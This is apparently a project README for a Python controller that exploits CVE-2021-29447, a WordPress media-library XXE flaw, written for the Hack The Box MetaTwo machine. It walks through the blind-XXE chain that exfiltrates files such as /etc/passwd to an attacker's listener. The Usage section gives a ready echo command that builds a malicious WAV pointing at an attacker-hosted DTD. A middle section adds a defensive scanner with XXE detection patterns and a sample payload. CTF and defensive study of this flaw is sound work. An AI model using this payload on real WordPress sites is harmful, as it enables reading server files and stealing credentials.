/blind-xxe-controller-CVE-2021-29447

Arbitrary file read controller based on CVE-2021-29447

Primary language: Python

Blind XXE controller

I made this controller while doing the MetaTwo machine on Hack The Box, to exploit CVE-2021-29447, a WordPress XXE vulnerability in the Media Library affecting versions 5.7, 5.6.2, 5.6.1, 5.6 and 5.0.11. An authenticated user with the ability to upload to the media library can upload a malicious WAV file, which can lead to remote arbitrary file read and server-side request forgery (SSRF).

Exploiting this vulnerability takes multiple steps. The result of the parsed iXML metadata is never sent back to the user, so a blind XXE payload is required. This is done by including an external Document Type Definition (DTD) controlled by the attacker, and by creating the malicious WAV file that makes the target connect back to the attacker's listening server. Once those pieces are in place, upload the WAV file to the server and wait for an HTTP request that carries the base64-encoded content of the requested file (e.g. /etc/passwd), then decode the base64. This controller automates all of these steps: you only need to type the filename at the controller's $console > prompt.
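The defensive counterpart to the chain described above is to look at what an uploaded WAV actually carries before any XML-aware library touches it. The following is an added example (not part of this project) that walks the RIFF container with bounds-checked reads, extracts the iXML chunk and flags the constructs that have no place in audio metadata: a DOCTYPE, a parameter entity, and an external (SYSTEM/PUBLIC) entity. The sample files, the `dtd.invalid` host and the helper names are constructed for this example; the chunk layout (`RIFF` size `WAVE`, then `iXML` size payload) is the one the Usage section relies on.

```python
import re
import struct
from typing import List, Tuple


def riff_chunks(data: bytes) -> List[Tuple[bytes, bytes]]:
    """Walk a RIFF/WAVE container and return (chunk_id, payload) pairs.

    Every read is bounds-checked and the payload slice is clamped to the
    buffer, so a truncated file or an over-large size field in a hand-crafted
    header cannot push the parser past the end of the data."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE container")
    chunks = []
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        payload = data[pos + 8:pos + 8 + size]   # slicing clamps to the buffer end
        chunks.append((cid, payload))
        pos += 8 + size + (size & 1)              # RIFF chunks are word-aligned
    return chunks


# Markup constructs that legitimate iXML metadata never needs.
XXE_PATTERNS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "external_entity": re.compile(rb"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.I),
}


def scan_ixml(data: bytes) -> List[str]:
    """Return the names of the XXE indicators found in any iXML chunk.

    An empty list means the file carries no DTD-related markup; anything
    else is a reason to reject the upload before it reaches an XML parser."""
    findings = []
    for cid, payload in riff_chunks(data):
        if cid != b"iXML":
            continue
        for name, pattern in XXE_PATTERNS.items():
            if pattern.search(payload):
                findings.append(name)
    return findings


def make_wav(ixml: bytes) -> bytes:
    """Build a minimal RIFF/WAVE file whose only chunk is iXML (constructed test input)."""
    if len(ixml) & 1:
        ixml += b"\x00"                           # pad to an even chunk size
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + ixml
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WAVE" + chunk


# Constructed samples: ordinary production metadata versus the DOCTYPE /
# parameter-entity / external-DTD shape used by the blind-XXE technique.
BENIGN = make_wav(b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>')
SUSPICIOUS = make_wav(
    b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
    b"'http://dtd.invalid/evil.dtd'>%remote;]>"
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_ixml(blob) or "clean")
```

Because the scan works on raw bytes, it is safe to run on untrusted uploads: nothing is parsed as XML, so a file designed to make an XML parser fetch a remote DTD gains nothing from being inspected this way.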

Detailed blog post: https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/

Note: this controller is fully configured for the HTB MetaTwo machine. For any other use you will need to make some changes to the scripts.

Usage

Create a WAV file named payload.wav:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Run main.py with the IP the target should connect back to:

python3 main.py listen_ip

PoC image: /poc/poc.png